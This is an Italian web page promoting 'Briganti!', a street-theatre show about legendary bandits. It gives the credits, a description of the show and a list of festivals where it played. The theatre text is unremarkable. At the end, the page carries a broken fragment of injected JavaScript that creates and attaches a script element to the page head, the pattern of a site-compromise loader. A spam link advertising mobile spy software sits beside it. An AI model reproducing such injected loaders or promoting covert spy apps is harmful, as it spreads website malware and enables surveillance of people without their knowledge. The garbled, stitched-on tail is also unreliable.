Briganti!

Spettacolo teatrale in quattro quadri.

di Barbara Sinicco
Musiche a cura di Chiara Minca e Massimo Serli
Con Sergio Pancaldi, Paola Castellan, Chiara Minca, Massimo Serli, Barbara Sinicco

“Briganti!” è uno spettacolo teatrale pensato per la strada, le sue vie, le piazze, il mercato. Lo scenario sono i vecchi vicoli, la scalinata che porta al castello o che dà sul mare, e forse qualche angolo buio, dove potrebbe accadere qualcosa di strano… Magari un gruppo di briganti, che sbuca all’improvviso…ma anche l’interno di una sala teatrale può assumere un altro aspetto se invaso da tali personaggi.

Prerogativa dei briganti è infatti il travestimento, la versatilità, l’improvvisazione di un mestiere o la carità. Un cantastorie segue e ci canta le loro vicende. Egli smaschera le loro azioni, mette a nudo i loro cuori, ci conduce in un viaggio che parte dai Balcani, passa per l’Europa dell’est, territorio degli aiduchi, attraversa la Sicilia, dove incontriamo il mitico bandito Giuliano, e si spinge fino in Sud America, nel profondo sertao dei jaguncos e di Lampiao; ovunque la fame e la miseria spingessero uomini e donne, semplici contadini, pastori, analfabeti, ad alzare la testa contro una sorte infame, a modo loro, rubando, uccidendo, senza riuscire a scatenare la rivoluzione “vera”, ma smettendo per sempre di curvare la schiena.

Miracoli e santi di ogni paese sostengono le loro battaglie perse, le speranze e le crudeltà. Magia e superstizione avvolgono le loro azioni, la Madonna stessa li protegge. Ogni scena è improvvisa, scalzante, ricca di buffonerie, un tragicomico atto a cogliere sempre di sorpresa lo spettatore, una volta alleato, un’altra nemico, un’altra ancora preda. Storie di briganti veri o di fantasia, avvolti dalla leggenda, protagonisti di migliaia di ballate, amati dal popolo e reinventati da esso, di donne-schiave coraggiose e intraprendenti, celebrati nelle forme del teatro di strada, della musica, della prosa.

“Briganti!” è stato rappresentato in numerosi festival nazionali e internazionali tra cui:

  • La terra dei racconti( Vallo di Nera-Umbria)
  • Napolistritfestival
  • Mercantia ( Certaldo)
  • Earth festival ( Vlasti-Grecia)
  • Festambiente ( Grosseto)
  • Festival internazionale di Pennabilli
  • Città: Bassano del Grappa, Sarmede, Oderzo, Trieste, Massa Marittima

Photogallery

Video

} else {

var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.